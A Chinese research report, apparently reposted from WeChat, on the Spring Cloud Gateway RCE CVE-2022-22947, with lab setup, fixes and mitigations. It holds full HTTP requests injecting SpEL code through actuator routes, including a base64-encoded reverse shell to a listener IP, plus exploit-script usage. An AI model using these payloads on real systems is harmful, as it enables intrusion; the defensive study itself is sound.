1.1 漏洞信息表
|
漏洞名称 |
Spring Cloud Gateaway远程代码执行漏洞 |
|
发布时间 |
2022-03-01 |
|
漏洞编号 |
CVE-2022-22947 |
|
威胁类型 |
代码执行漏洞 |
|
危害级别 |
高危 |
|
影响版本 |
3.1.0 3.0.0-3.0.6 3.0.0之前的版本 |
|
漏洞描述 |
产品介绍:Spring Cloud Gateway是基于Spring Framework 和 Spring Boot 构建的API网关,目标旨在为微服务架构提供一种简单、有效、统一的 API路由管理方式。 漏洞概述:Spring Cloud Gateway的Actuator端点存在缺陷,当用户启用并暴露了不安全的 Gateway Actuator 端点时,使用了 Spring Cloud Gateway的应用程序容易受到代码注入攻击 危害说明:攻击者可通过利用此漏洞在目标服务器上执行任意恶意代码,获取系统权限。 |
|
漏洞指纹 |
常用端口/协议:HTTP协议 关键路径:POST、GET请求 /actuator/gateway/routes/ /actuator/gateway/refresh |
|
漏洞验证与利用 |
POC: CVE-2022-22947.py EXP:CVE-2022-22947.py |
|
修复建议 |
正式修复方案: 目前官方已发布安全补丁与新版本修复了该漏洞,请受影响的用户尽快更新版本进行防护,官方下载链接: https://spring.io/blog/2022/02/18/spring-cloud-2021-0-1-has-been-released 临时修复方案: 1、如果业务不需要使用Gateway actuator端点,可通过修改配置文件为management.endpoint.gateway.enabled: false进行禁用。 2、如果需要使用actuator,则需使用 Spring Security对其进行防护,操作可参考官方指南: https://docs.spring.io/spring-boot/docs/current/reference/html/actuator.html#actuator.endpoints.security |
|
参考链接 |
漏洞安全通告: https://tanzu.vmware.com/security/cve-2022-22947 漏洞补丁: https://spring.io/blog/2022/02/18/spring-cloud-2021-0-1-has-been-released |
2.1 漏洞靶机搭建
2.1.1 第三方集成环境
1.安装vulhub环境:
git clone https://github.com/vulhub/vulhub.git
2.切到spring目录启动目标环境:
docker-compose up -d
访问网站出现如下页面,则说明漏洞环境安装成功:
http://192.168.111.128:8080
2.2 POC漏洞验证
漏洞验证:
1.发送数据包添加一个包含恶意SpEL表达式的路由:
|
POST /actuator/gateway/routes/test HTTP/1.1 Host: 192.168.111.128:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/json Content-Length: 325 { "id": "test", "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"id"}).getInputStream()))}" } }], "uri": "http://example.com" } |
2.发送数据包刷新刚添加的路由
|
POST /actuator/gateway/refresh HTTP/1.1 Host: 192.168.111.128:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 329 |
3. 发送数据包查看执行结果
|
GET /actuator/gateway/routes/test HTTP/1.1 Host: 192.168.111.128:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 |
4.删除路由
|
DELETE /actuator/gateway/routes/test HTTP/1.1 Host: 192.168.111.128:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 |
5. 最后再刷新一次路由
|
POST /actuator/gateway/refresh HTTP/1.1 Host: 192.168.111.128:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 329 |
2.3 集成工具验证
1.工具名称:CVE-2022-22947.py
2.使用方法
使用说明:-h参数
单个检测:python3 CVE-2022-22947.py -u http://192.168.111.128:8080
批量检测:python3 CVE-2022-22947.py -f url.txt
3.1 手工利用
3.1.1 反弹shell
(通过反弹shell的方式获取权限。)
在参数中执行反弹shell的exp,攻击机监听9090端口:
|
POST /actuator/gateway/routes/shell HTTP/1.1 Host: 192.168.111.128:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/json Content-Length: 399 { "id": "shell", "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xLjUuMTMvOTA5MCAwPiYx}|{base64,-d}|{bash,-i}").getInputStream()))}" } }], "uri": "http://example.com" } |
2. 刷新就能接收到shell
成功反弹shell:
3.2 集成工具利用
1.漏洞检测
2.反弹shell
执行如下命令:
python3 CVE-2022-22947.py -u http://192.168.111.128:8080 -l 10.1.5.13:9090
攻击机接收到shell:
4.1 修复方案1:临时修复方案
4.2 修复方案2:标准解决方案
按官方建议升级修复:
https://spring.io/blog/2022/02/18/spring-cloud-2021-0-1-has-been-released
PS:后台回复斗哥YYDS,即可获取检测工具。
原文始发于微信公众号(国科漏斗社区):Spring Cloud Gateaway远程代码执行漏洞研究报告
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论